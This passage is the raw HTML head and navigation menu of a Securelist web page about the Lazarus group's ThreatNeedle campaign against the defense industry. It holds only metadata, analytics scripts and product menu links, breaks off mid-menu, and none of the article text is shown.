<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <script type="text/javascript"> /* <![CDATA[ */ var gform;gform||(document.addEventListener("gform_main_scripts_loaded",function(){gform.scriptsLoaded=!0}),window.addEventListener("DOMContentLoaded",function(){gform.domLoaded=!0}),gform={domLoaded:!1,scriptsLoaded:!1,initializeOnLoaded:function(o){gform.domLoaded&&gform.scriptsLoaded?o():!gform.domLoaded&&gform.scriptsLoaded?window.addEventListener("DOMContentLoaded",o):document.addEventListener("gform_main_scripts_loaded",o)},hooks:{action:{},filter:{}},addAction:function(o,n,r,t){gform.addHook("action",o,n,r,t)},addFilter:function(o,n,r,t){gform.addHook("filter",o,n,r,t)},doAction:function(o){gform.doHook("action",o,arguments)},applyFilters:function(o){return gform.doHook("filter",o,arguments)},removeAction:function(o,n){gform.removeHook("action",o,n)},removeFilter:function(o,n,r){gform.removeHook("filter",o,n,r)},addHook:function(o,n,r,t,i){null==gform.hooks[o][n]&&(gform.hooks[o][n]=[]);var e=gform.hooks[o][n];null==i&&(i=n+"_"+e.length),gform.hooks[o][n].push({tag:i,callable:r,priority:t=null==t?10:t})},doHook:function(n,o,r){var t;if(r=Array.prototype.slice.call(r,1),null!=gform.hooks[n][o]&&((o=gform.hooks[n][o]).sort(function(o,n){return o.priority-n.priority}),o.forEach(function(o){"function"!=typeof(t=o.callable)&&(t=window[t]),"action"==n?t.apply(null,r):r[0]=t.apply(null,r)})),"filter"==n)return r[0]},removeHook:function(o,n,t,i){var r;null!=gform.hooks[o][n]&&(r=(r=gform.hooks[o][n]).filter(function(o,n,r){return!!(null!=i&&i!=o.tag||null!=t&&t!=o.priority)}),gform.hooks[o][n]=r)}}); /* ]]> */ </script> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://securelist.com/xmlrpc.php" /> <link rel="apple-touch-icon" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="96x96" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-96x96.png"> <link rel="icon" type="image/png" sizes="48x48" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-48x48.png"> <link rel="icon" type="image/png" sizes="32x32" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-16x16.png"> <link rel="manifest" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/site.webmanifest"> <title>Lazarus targets defense industry with ThreatNeedle | Securelist</title> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <!-- The SEO Framework by Sybre Waaijer --> <meta name="keywords" content="APT,Lazarus,Macros,Malware Descriptions,Malware Technologies,Microsoft Office,Spear phishing" /> <link rel="canonical" href="https://securelist.com/lazarus-threatneedle/100803/" /> <meta name="description" content="In mid&#x2d;2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped)." /> <meta property="og:type" content="article" /> <meta property="og:title" content="Lazarus targets defense industry with ThreatNeedle" /> <meta property="og:description" content="In mid&#x2d;2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped)." /> <meta property="og:url" content="https://securelist.com/lazarus-threatneedle/100803/" /> <meta property="og:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data.jpg" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:site" content="@Securelist" /> <meta name="twitter:creator" content="@Securelist" /> <meta name="twitter:title" content="Lazarus targets defense industry with ThreatNeedle" /> <meta name="twitter:description" content="In mid&#x2d;2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped)." /> <meta name="twitter:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data.jpg" /> <script type="application/ld+json">{"@context":"https://schema.org","@type":"NewsArticle","mainEntityOfPage":{"@type":"WebPage","@id":"https://securelist.com/lazarus-threatneedle/100803/"},"headline":"Lazarus targets defense industry with ThreatNeedle","image":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data.jpg","datePublished":"2021-02-25T10:00:53+00:00","dateModified":"2021-05-27T15:13:38+00:00","author":{"@type":"Person","name":"Vyacheslav Kopeytsev","url":"https://securelist.com/author/vyacheslavkopeytsev/"},"publisher":{"@type":"Organization","name":"Kaspersky","logo":{"@type":"ImageObject","url":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/06/04065705/article-logo-small_new.png","width":60,"height":60}},"description":"In mid&#x2d;2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped)."}</script> <!-- / The SEO Framework by Sybre Waaijer | 82.78ms meta | 0.15ms boot --> <link rel='dns-prefetch' href='//kasperskycontenthub.com' /> <link rel='dns-prefetch' href='//securelist.com' /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com &raquo; Feed" href="https://securelist.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com &raquo; Comments Feed" href="https://securelist.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com &raquo; Lazarus targets defense industry with ThreatNeedle Comments Feed" href="https://securelist.com/lazarus-threatneedle/100803/feed/" /> <link rel='stylesheet' id='crayon-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/crayon-syntax-highlighter/css/min/crayon.min.css,wp-includes/css/dist/block-library/style.min.css,wp-content/plugins/jquery-collapse-o-matic/css/core_style.css,wp-content/plugins/jquery-collapse-o-matic/css/light_style.css,wp-content/plugins/kspr_twitter_pullquote/css/style.css,wp-content/themes/securelist2020/assets/css/main.css,wp-content/plugins/kaspersky-social-sharing/assets/css/style.css,wp-content/plugins/kaspersky-social-sharing/assets/css/custom.css' type='text/css' media='all' /> <link rel='stylesheet' id='taxonomy-image-plugin-public-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/taxonomy-images/css/style.css' type='text/css' media='screen' /> <script type="text/javascript" src="https://securelist.com/wp-content/plugins/kaspersky-enable-jquery-migrate-helper/js/jquery/jquery-1.12.4-wp.js?ver=1.12.4-wp" id="jquery-core-js"></script> <script type="text/javascript" id="kasbanner-front-script-js-extra"> /* <![CDATA[ */ var kasbanner_frontend_ajax_object = {"restURL":"https:\/\/securelist.com\/wp-json\/","postID":"100803","postStatus":"publish"}; /* ]]> */ </script> <script type="text/javascript" id="kaspersky-sso-integration-js-extra"> /* <![CDATA[ */ var kasperskySSOIntegrationData = {"authorizationURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/authorize?client_id=securelist&client_name=Securelist&redirect_uri=https%3A%2F%2Fsecurelist.com%2Fkaspersky-sso%2Flogin%2F&response_type=code&scope=openid email profile offline_access","endSessionURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/endsession?id_token_hint=eyJhbGciOiJSUzI1NiIsImtpZCI6IkNCNzFGQTExMjc4MzgyMzQ3OTAxNzlENkJGMkVBNkFCRkZGOEQ5OUYiLCJ4NXQiOiJ5M0g2RVNlRGdqUjVBWG5Xdnk2bXFfXzQyWjgiLCJ0eXAiOiJKV1QifQ.eyJhdF9oYXNoIjoiT3VzcElmcVoyd1JkeXBDM25ZWWhEUSIsInNpZCI6Ii1xVTB3UGJMVDk5enZlYjBYOXNZY0EiLCJzdWIiOiIzMzkwM2IxZS0yZmY4LTQ3NmUtOWRkOS1kMTllMjRmYTg1MjAiLCJhdXRoX3RpbWUiOiIxNzQwMDgwODkxIiwiaWRwIjoiS2FzcGVyc2t5SWQiLCJrYXNwZXJza3kuc3ViX3ZlcnNpb24iOiIxIiwia2FzcGVyc2t5LnN1c3BpY2lvdXNfYXV0aGVudGljYXRpb24iOiJ0cnVlIiwibmJmIjoxNzQwMDgwOTAyLCJleHAiOjE3NDAxNjczMDIsImlhdCI6MTc0MDA4MDkwMiwiaXNzIjoiaHR0cHM6Ly9hdXRoLmNhLnVpcy5rYXNwZXJza3kuY29tIiwiYXVkIjoic2VjdXJlbGlzdCJ9.Ed5_QLgI5hdERW89QVT0uttD4HAKLboADRrmJ6WC7c2brqWndLlNE6XJ_5E49UF-Hse3hVh1omqHeIWV2IeSw19nljSRqePBnHsfcINwJKur-jyUFNXhYvX0ZXUnarB5xgGmUSt-p2RrrZhn-12dbc1ccb7CmHQ4wkthnI4ROElXGbVIqc1R9bmZut-x9sgE6Oc1oJqZUF2lx2fjr-eI6UBRHCKr_pUkYlDQ_yW8-tBMCaph4YtpbhWTWxYNOOngh2gjxylepNaSQJZtpGPgLpoYJXITcwutwFg4s_WOHDxfhq-isl8yTUazMqFCSe5WHZJhWi82r32bZEeg68WuYA&post_logout_redirect_uri=https:\/\/securelist.com\/kaspersky-sso\/logout\/"}; /* ]]> */ </script> <script type="text/javascript" id="kss_js-js-extra"> /* <![CDATA[ */ var kss = {"twitter_account":"Securelist"}; /* ]]> */ </script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/kaspersky-lazy-load/assets/js/lazyload.js,wp-content/plugins/kaspersky-banners/assets/js/script.js,wp-content/plugins/kaspersky-sso-integration/assets/js/main.js,wp-content/plugins/kspr_twitter_pullquote/js/kaspersky-twitter-pullquote.js,wp-content/plugins/kaspersky-social-sharing/assets/js/social-share.js'></script> <link rel="alternate" hreflang="x-default" href="https://securelist.com/lazarus-threatneedle/100803/" /> <link rel="alternate" hreflang="ru" href="https://securelist.ru/lazarus-threatneedle/100591/" /> <script> window.dataLayer = window.dataLayer || []; window.dataLayer.push({ 'Author' : 'Vyacheslav Kopeytsev', 'PostId' : '100803', 'PublicationDate' : '2021-02-25', 'Categories': 'APT reports', 'Tags': 'APT, Lazarus, Macros, Malware Descriptions, Malware Technologies, Microsoft Office, Spear phishing', }); </script> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-5CGZ3HG');</script> <!-- End Google Tag Manager --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-WZ7LJ3');</script> <!-- End Google Tag Manager --> <link rel="https://api.w.org/" href="https://securelist.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://securelist.com/wp-json/wp/v2/posts/100803" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://securelist.com/xmlrpc.php?rsd" /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Flazarus-threatneedle%2F100803%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Flazarus-threatneedle%2F100803%2F&#038;format=xml" /> <script type="text/javascript"> var sNew = document.createElement("script"); sNew.async = true; sNew.src = "https://kasperskycontenthub.com/?dm=ed1f9e435dc885292eab65620c51f3fb&action=load&blogid=43&siteid=1&t=767222430&back=https%3A%2F%2Fsecurelist.com%2Flazarus-threatneedle%2F100803%2F" var s0 = document.getElementsByTagName('script')[0]; s0.parentNode.insertBefore(sNew, s0); </script> <script type="text/javascript"> document.write(unescape("%3Cscript src='//munchkin.marketo.net/munchkin.js' type='text/javascript'%3E%3C/script%3E")); </script> <script>Munchkin.init('802-IJN-240');</script> <meta name="google-site-verification" content="o48MojucKcP-DT5iCMR8AsvkVWP14fE78flHCqqjo50" /> <script type="text/javascript"> var jQueryMigrateHelperHasSentDowngrade = false; window.onerror = function( msg, url, line, col, error ) { // Break out early, do not processing if a downgrade reqeust was already sent. if ( jQueryMigrateHelperHasSentDowngrade ) { return true; } var xhr = new XMLHttpRequest(); var nonce = '999dc9864d'; var jQueryFunctions = [ 'andSelf', 'browser', 'live', 'boxModel', 'support.boxModel', 'size', 'swap', 'clean', 'sub', ]; var match_pattern = /\)\.(.+?) is not a function/; var erroredFunction = msg.match( match_pattern ); // If there was no matching functions, do not try to downgrade. if ( typeof erroredFunction !== 'object' || typeof erroredFunction[1] === "undefined" || -1 === jQueryFunctions.indexOf( erroredFunction[1] ) ) { return true; } // Set that we've now attempted a downgrade request. jQueryMigrateHelperHasSentDowngrade = true; xhr.open( 'POST', 'https://securelist.com/wp-admin/admin-ajax.php' ); xhr.setRequestHeader( 'Content-Type', 'application/x-www-form-urlencoded' ); xhr.onload = function () { var response, reload = false; if ( 200 === xhr.status ) { try { response = JSON.parse( xhr.response ); reload = response.data.reload; } catch ( e ) { reload = false; } } // Automatically reload the page if a deprecation caused an automatic downgrade, ensure visitors get the best possible experience. if ( reload ) { location.reload(); } }; xhr.send( encodeURI( 'action=jquery-migrate-downgrade-version&_wpnonce=' + nonce ) ); // Suppress error alerts in older browsers return true; } </script> <div id="fb-root"></div> <script> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=160639043985664"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <script> (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = '//apis.google.com/js/platform.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })(); </script> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-32x32.png" sizes="32x32" /> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-180x180.png" /> <meta name="msapplication-TileImage" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-270x270.png" /> </head> <body class="post-template-default single single-post postid-100803 single-format-standard lang-en_US c-theme--light"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5CGZ3HG" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WZ7LJ3" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div id="site-top" class="site-top"> <div class="container"> <nav class="site-nav" data-element-id="product-menu"> <div class="label"> <p>Solutions for:</p> </div> <ul id="menu-product-menu-daily-nxgen" class="site-selector"><li><a target="_blank" href="https://www.kaspersky.com/home-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-home menu-item menu-item-type-custom menu-item-object-custom menu-item-87907">Home Products</a></li> <li><a title="font-icons icon-small-business" target="_blank" href="https://www.kaspersky.com/small-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-small-business menu-item menu-item-type-custom menu-item-object-custom menu-item-87908">Small Business 1-50 employees</a></li> <li><a target="_blank" href="https://www.kaspersky.com/small-to-medium-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-medium-business menu-item menu-item-type-custom menu-item-object-custom menu-item-87909">Medium Business 51-999 employees</a></li> <li><a target="_blank" href="https://www.kaspersky.com/enterprise-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-enterprise menu-item menu-item-type-custom menu-item-object-custom menu-item-87910">Enterprise 1000+ employees</a></li> </ul> </nav> </div> </div> <header id="site-header" class="site-header js-sticky-mobile-header"> <div class="container"> <a href="" class="c-page-nav-toggle js-mobile-menu-toggle"> <span class="c-page-nav-toggle__icon"> <span></span> <span></span> <span></span> </span> </a> <a href="" class="menu-toggle"> <span></span> <span></span> <span></span> </a> <div class="c-site-title"> <div class="c-site-logo__group"> <a data-element-id="securelist-logo" href="https://securelist.com/" class="c-site-logo c-site-logo--basic"></a> <span class="c-site-tagline">by Kaspersky</span> </div> </div> <ul id="menu-my-kaspersky" class="menu-utility sticky-utility"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87905"><a href="https://companyaccount.kaspersky.com/account/login?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="companyaccount">CompanyAccount</a> <li class="sticky-item sticky-xl-only menu-item menu-item-type-custom menu-item-object-custom menu-item-87906"><a href="https://www.kaspersky.com/enterprise-security/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="getintouch">Get In Touch</a> <li class="securelist-theme-switcher menu-item menu-item-type-custom menu-item-object-custom menu-item-99824"><a data-element-id="dark-mode" href="#" class="js-theme-switcher"><i class="font-icons icon-moon"></i>Dark mode<span class="u-hidden u-inline--dark"> off</span></a> <li class="dropdown"><a data-element-id="lang-selector" href="#" class="">English</a><ul class="sub-menu-regular"><li><a href="https://securelist.ru/lazarus-threatneedle/100591/">Russian</a></li><li><a href="https://securelist.lat">Spanish</a></li></ul> </ul> <div class="c-page-search js-main-search"> <form class="c-page-search__form c-page-search__form--small js-wizardinfosys_autosearch_form" full_search_url="https://securelist.com/?s=%q%" action="https://securelist.com/" method="get"> <div class="c-form-element c-form-element--style-fill"> <div class="c-form-element__field wp_autosearch_form_wrapper"> <input name="s" class="c-form-element__text wp_autosearch_input ac_input" data-webinars="" type="text" value="" placeholder="Search..." autocomplete="off"> </div> </div> <button class="c-button c-button--icon wp_autosearch_submit"><svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use></svg></button> </form> <div class="c-page-search__toggle js-main-search-toggle"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use></svg></div> </div> <nav class="main-nav" data-element-id="nextgen-menu"> <ul id="menu-corp-menu" class="main-menu"><li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87706"><a href="https://www.kaspersky.com/enterprise-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Solutions</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87707"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-iot-embed-security menu-item menu-item-type-custom menu-item-object-custom menu-item-87710"><figure><a href="https://www.kaspersky.com/enterprise-security/embedded-security-internet-of-things?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/iot-embed-security.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/embedded-security-internet-of-things?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Internet of Things &#038; Embedded Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/embedded-security-internet-of-things?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-transportation-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87712"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/transportation-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Industrial Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-fraud-prevention menu-item menu-item-type-custom menu-item-object-custom menu-item-87713"><figure><a href="https://www.kaspersky.com/enterprise-security/fraud-prevention?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/fraud-prevention.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/fraud-prevention?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Fraud Prevention</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/fraud-prevention?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-87711"><a href="https://www.kaspersky.com/enterprise-security/kasperskyos?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">KasperskyOS-based solutions</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/kasperskyos?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other solutions</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105615"><a href="https://www.kaspersky.com/enterprise-security/security-operations-center-soc?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky for Security Operations Center</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105614"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-iot-infrastructure-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky IoT Infrastructure Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112322"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-secure-remote-workspace?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Secure Remote Workspace</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87714"><a href="https://www.kaspersky.com/enterprise-security/industries?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Industries</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87715"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-national-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87716"><figure><a href="https://www.kaspersky.com/enterprise-security/national-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/national-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/national-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">National Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/national-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-industrial-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87717"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/industrial-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Industrial Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-financial-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87718"><figure><a href="https://www.kaspersky.com/enterprise-security/finance?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/financial-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/finance?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Finance Services Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/finance?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-healthcare-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87719"><figure><a href="https://www.kaspersky.com/enterprise-security/healthcare?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/healthcare-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/healthcare?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Healthcare Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/healthcare?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-transportation-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87720"><figure><a href="https://www.kaspersky.com/enterprise-security/transportation-cybersecurity-it-infrastructure?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/transportation-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/transportation-cybersecurity-it-infrastructure?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Transportation Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/transportation-cybersecurity-it-infrastructure?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-retail-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87721"><figure><a href="https://www.kaspersky.com/enterprise-security/retail-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img 